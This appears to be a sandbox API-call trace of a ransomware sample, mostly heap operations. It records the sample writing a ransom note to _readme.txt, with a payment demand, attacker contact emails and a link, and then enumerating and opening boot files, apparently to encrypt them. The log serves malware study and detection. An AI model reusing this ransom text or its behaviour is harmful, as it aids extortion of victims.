[0228.031] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0228.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0228.032] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.032] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0228.032] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.032] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.032] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0228.032] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.032] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.032] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.032] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0228.032] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.032] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.032] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.032] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0228.032] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0228.032] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.032] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.032] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0228.032] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0228.032] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.032] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.032] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0228.032] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.032] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.032] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.032] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0228.032] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.033] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.033] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.033] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0228.033] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.033] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.033] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.033] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0228.033] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.033] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.033] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.033] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0228.033] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.033] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.033] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.033] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0228.033] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.033] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.033] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.033] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0228.033] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.033] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.033] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.033] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0228.033] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.033] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0228.034] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.034] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0228.034] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.034] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0228.034] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.034] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0228.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0228.034] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.034] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0228.034] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0228.034] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.034] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0228.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0228.034] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.035] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0228.035] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0228.035] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0228.035] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0228.035] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0228.035] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0228.035] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.035] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0228.035] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.035] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0228.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0228.035] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.035] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0228.035] PathFindFileNameW (pszPath="C:\\Boot\\pl-PL\\") returned="pl-PL\\" [0228.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0228.036] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0228.036] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.036] PathFindFileNameW (pszPath="") returned="" [0228.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0228.036] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75000000 [0228.036] GetProcAddress (hModule=0x75000000, lpProcName="SHGetFolderPathW") returned 0x75085708 [0228.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x325c3b0 [0228.036] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x325c3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x37a2b08 [0228.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.037] FreeLibrary (hLibModule=0x75000000) returned 1 [0228.037] PathAppendW (in: pszPath="C:\\Boot\\pl-PL\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pl-PL\\_readme.txt") returned 1 [0228.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0228.037] PathFileExistsW (pszPath="C:\\Boot\\pl-PL\\_readme.txt") returned 0 [0228.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x37b0468 [0228.037] lstrcpyW (in: lpString1=0x37b0468, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" [0228.037] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0228.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3c18 [0228.037] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\_readme.txt" (normalized: "c:\\boot\\pl-pl\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.038] FindFirstFileW (in: lpFileName="C:\\Boot\\pl-PL\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0228.038] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.038] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0228.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7388 [0228.038] PathFindExtensionW (pszPath="C:\\Boot\\pl-PL\\bootmgr.exe.mui") returned=".mui" [0228.038] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.038] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b7388 | out: hHeap=0x630000) returned 1 [0228.038] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0228.038] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0228.038] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed850 | out: hHeap=0x630000) returned 1 [0228.039] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0228.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed850 [0228.039] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0228.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0228.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0228.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0228.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0228.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0228.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0228.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0228.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0228.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0228.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0228.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0228.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0228.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0228.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.040] 